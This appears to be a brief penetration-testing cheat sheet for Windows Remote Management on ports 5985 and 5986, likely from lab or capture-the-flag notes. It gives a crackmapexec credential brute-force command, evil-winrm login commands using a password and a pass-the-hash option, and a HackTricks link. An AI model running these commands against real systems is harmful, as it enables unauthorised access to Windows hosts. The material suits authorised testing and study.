5985,5986 - Pentesting winrm

windows

bruteforce user / password

crackmapexec winrm $IP -u users.txt -p pass.txt --continue-on-success

evil-winrm - with password

evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.'  -i <IP>/<Domain>

evil-winrm - with hash

evil-winrm -u <username> -H <Hash> -i <IP>

links

https://book.hacktricks.xyz/network-services-pentesting/5985-5986-pentesting-winrm